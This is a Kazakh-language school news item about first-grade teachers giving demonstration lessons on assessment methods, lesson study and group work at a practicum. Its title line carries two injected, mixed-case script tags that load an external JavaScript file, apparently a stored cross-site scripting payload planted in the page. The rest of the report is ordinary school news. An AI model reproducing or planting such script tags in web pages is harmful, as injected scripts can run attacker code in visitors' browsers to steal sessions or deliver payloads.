« Жаңартылған білім беру бағдарламасы: 1-ші сынып мұғалімдерінің жұмыс тәжірибе» практикумы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.02.2020

3 ақпаннан бастап № 3 ОМ 1 сынып мұғалімдері мектеп директорымен бекітілген жұмыс жоспары бойынша тәжірибелік сабақтар өткізді. Бұл сабақтың мақсаты: жас мамандарға қазіргі заманғы бағалау тәсілдерін анықтауға көмек көрсету; БЖБ және ТЖБ қалдыру бойынша әдістемелік ұсыныстар беру; тәлімгерлер мұғалімдерінің тәжірибесімен алмасу. Смагулова    А. А. мен. Жумаенова Г. Б  мұғалімдерді  "Сабақты зерттеумен" таныстырды, Минина Л. Н. мастер-класс көрсетті, Клименко Н. С. ойын технологияларын қолданумен математика сабағын өткізді, Ахметова А. К. сабақта кері байланыс бойынша жұмысты көрсетті, Мусина А. К. топтық жұмыс жүргізді. Барлық әріптестер белсенді қатысты. Бастауыш сынып  оқу ісінің меңгерушісі Габбасова А. Б. әріптестеріне жемісті жұмысы үшін алғыс айтты.

ӘБ жетекшісі Смагулова А. А.

Просмотров: 678


Пікір қосу



Деректерді қолтаңбаға қосу